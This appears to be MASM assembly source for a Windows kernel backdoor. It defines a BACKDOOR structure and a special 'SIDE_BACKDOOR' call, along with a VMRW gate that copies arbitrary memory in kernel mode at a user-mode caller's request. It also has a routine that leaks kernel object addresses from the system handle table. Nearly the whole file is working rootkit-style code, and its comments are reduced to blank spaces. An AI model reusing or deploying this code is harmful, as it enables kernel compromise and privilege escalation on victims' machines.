%GET_GRAPH_REFERENCE macro
GPREF::
	pop eax
	ret
endm

%GET_CURRENT_GRAPH_ENTRY macro
	Call GPREF
endm

%GET_GRAPH_ENTRY macro PGET_CURRENT_GRAPH_ENTRY
	Call PGET_CURRENT_GRAPH_ENTRY
endm

	%GET_GRAPH_REFERENCE
	
KTRAP_FRAME struct
DbgEbp		ULONG ?	; +0
DbgEip		ULONG ?	; +4
DbgArgMark	ULONG ?	; +8
DbgArgPointer	ULONG ?	; +C

TempCs		ULONG ?	; +10
TempEsp		ULONG ?	; +14

rDr0			ULONG ?	; +18
rDr1			ULONG ?	; +1C
rDr2			ULONG ?	; +20
rDr3			ULONG ?	; +24
rDr6			ULONG ?	; +28
rDr7			ULONG ?	; +2C

rGs			ULONG ?	; +30
rEs			ULONG ?	; +34
rDs			ULONG ?	; +38

rEdx			ULONG ?	; +3C
rEcx			ULONG ?	; +40
rEax			ULONG ?	; +44

PreviousPreviousMode	ULONG ?	; +48

ExceptionList	PVOID ?	; +4C

rFs			ULONG ?	; +50

rEdi			ULONG ?	; +54
rEsi			ULONG ?	; +58
rEbx			ULONG ?	; +5C
rEbp			ULONG ?	; +60

ErrCode		ULONG ?	; +64
rEip			ULONG ?	; +68
rCs			ULONG ?	; +6C
rEFlags		ULONG ?	; +70

; WARNING - Ss:Esp are only here for stacks that involve a ring transition.
HardwareEsp	ULONG ?	; +74
HardwareSegSs	ULONG ?	; +78

V86Es		ULONG ?
V86Ds		ULONG ?
V86Fs		ULONG ?
V86Gs		ULONG ?
KTRAP_FRAME ends
PKTRAP_FRAME typedef ptr KTRAP_FRAME

; - SIDE -
SIDE_NTCALL	equ 0BADC0DEH
SIDE_BACKDOOR	equ SIDE_NTCALL + 1

SHENV struct
Prolog	PVOID ?
Epilog	PVOID ?
SHENV ends

;    .
;
BACKDOOR struct
Kbase					PVOID ?	;  .
pMmGetSystemRoutineAddress	PVOID ?	; MmGetSystemRoutineAddress(Name:PUNICODE_STRING)
S						SHENV <>	;    -.
Senter					PVOID ?	; * -//-
Sip						PVOID ?	; * -//-
pMmCopy					PVOID ?	; @MmCopy
; (Src:PVOID, Dst:PVOID, S1ze:ULONG, S:PSHENV, Sip:PVOID)
Lde						PVOID ?	; @LDE(Ip:PVOID)
Kframe					PKTRAP_FRAME ?	; Kmode .
Uframe					PKTRAP_FRAME ?	; Umode (Kframe.DbgEbp).
BACKDOOR ends
PBACKDOOR typedef ptr BACKDOOR

;    .
;
UBUFFER struct
Tag		ULONG ?	; .
Address	PVOID ?	;   .
S1ze		ULONG ?	;  .
_Type	ULONG ?	;  (paged/nonpaged).
Args		PVOID ?
UBUFFER ends
PUBUFFER typedef ptr UBUFFER

MMRW struct
Src		PVOID ?
Dst		PVOID ?
S1ze		ULONG ?
MMRW ends
PMMRW typedef ptr MMRW

; +
; / .
;
; o Tag 'VMRW'
;
xGateVMRW:
	%GET_CURRENT_GRAPH_ENTRY
GateVMRW proc uses ebx Env:PBACKDOOR, Kframe:PKTRAP_FRAME, Kcontext:PCONTEXT, Uframe:PKTRAP_FRAME, pArgs:PMMRW
Local Mm:MMRW
	mov ebx,Env
	assume ebx:PBACKDOOR
	lea eax,[ebx].S
	lea ecx,Mm
	push [ebx].Sip
	push eax
	push sizeof(MMRW)
	push ecx
	push pArgs
	Call [Ebx].pMmCopy
	.if !Eax
		lea ecx,[ebx].S
		push [ebx].Sip
		push ecx
		push Mm.S1ze
		push Mm.Dst
		push Mm.Src
		Call [Ebx].pMmCopy
	.endif
	test eax,eax
	setz al	; BOOLEAN
	movzx eax,al
	ret
GateVMRW endp
xGateVMRW2:
	%GET_CURRENT_GRAPH_ENTRY

; +
;
VMRW proc Src:PVOID, Dst:PVOID, S1ze:ULONG
	lea eax,Src
	push eax
	push PagedPool
	;       ,      
	;   (push offset    ).    
	;    (    GET_GRAPH_ENTRY/GET_CU
	; RRENT_GRAPH_ENTRY).       .
	%GET_GRAPH_ENTRY xGateVMRW
	mov ecx,eax
	%GET_GRAPH_ENTRY xGateVMRW2
	sub eax,ecx
	sub eax,5	; ~ link size.
	push eax	; Size
	push ecx	; Address
	push "WRMV"
	xor eax,eax
	%SIDECALL SIDE_BACKDOOR
	ret
VMRW endp

.data
PUBLIC g_Objects
PUBLIC g_ObjSize
PUBLIC g_ObjN

g_Objects	PSYSTEM_HANDLE_INFORMATION ?	;   SystemHandleInformation
g_ObjSize	ULONG ?
g_ObjN	ULONG ?

.code
; +
; BUGBUG:     (NumberOfHandles).
;
; eg:
;	SystemInformationLength: 0x29000
;	NumberOfHandles: 0x3D06 -> length may be 0x3D064
;	ReturnLength: 0x276D4 -> real length, N = 0x276D
;
;	st: 0x15A77/0x13816, ~90% failed.
;
GetSnapObjects proc uses ebx
Local Buffer[sizeof(SYSTEM_HANDLE_INFORMATION)]:BYTE
Local S1ze:ULONG
	xor ebx,ebx
	cmp g_Objects,ebx
	jne Query	;   .
Alloc:
	mov g_Objects,ebx
	invoke ZwQuerySystemInformation, SystemHandleInformation, addr Buffer, sizeof(SYSTEM_HANDLE_INFORMATION), addr g_ObjSize
	cmp eax,STATUS_INFO_LENGTH_MISMATCH
	jne Exit
	add g_ObjSize,X86_PAGE_SIZE
	invoke ZwAllocateVirtualMemory, NtCurrentProcess, addr g_Objects, Ebx, addr g_ObjSize, MEM_COMMIT, PAGE_READWRITE
	test eax,eax
	jnz Exit
Query:
	invoke ZwQuerySystemInformation, SystemHandleInformation, g_Objects, g_ObjSize, addr g_ObjN
	.if Eax == STATUS_INFO_LENGTH_MISMATCH
		invoke ZwFreeVirtualMemory, NtCurrentProcess, addr g_Objects, addr g_ObjSize, MEM_RELEASE
		jmp Alloc
	.endif
	mov ecx,g_Objects
	.if !Eax
;		 ,         .
;		     ReturnLength  .
		mov ecx,SYSTEM_HANDLE_INFORMATION.NumberOfHandles[ecx]
		shl ecx,4
		add ecx,SYSTEM_HANDLE_INFORMATION.Handles
		.if g_ObjN != Ecx
			ifdef OPT_FAST_SNAPSHOT
				mov edx,g_ObjN
				mov ecx,g_Objects
				shr edx,4
				mov SYSTEM_HANDLE_INFORMATION.NumberOfHandles[ecx],edx
				xor eax,eax
			else
				jmp Query
			endif
		.endif
	.endif
Exit:
	setz al
	movzx eax,al
	ret	; *      .
GetSnapObjects endp

; +
;   .
;
GetKernelObject proc uses ebx Handle:HANDLE
	invoke GetSnapObjects
	.if Eax
		mov ecx,g_Objects
		mov eax,Handle
		mov edx,SYSTEM_HANDLE_INFORMATION.NumberOfHandles[ecx]	; N
		mov ebx,fs:[TEB.Cid.UniqueProcess]
		add ecx,SYSTEM_HANDLE_INFORMATION.Handles
		assume ecx:PSYSTEM_HANDLE_TABLE_ENTRY_INFO
		.repeat
			.if ([Ecx].UniqueProcessId == Bx) && ([Ecx].HandleValue == Ax)
				mov eax,[ecx].Object
				jmp Exit
			.endif
			add ecx,sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO)
			dec edx
		.until Zero?
	.endif
	xor eax,eax
Exit:
	ret
GetKernelObject endp
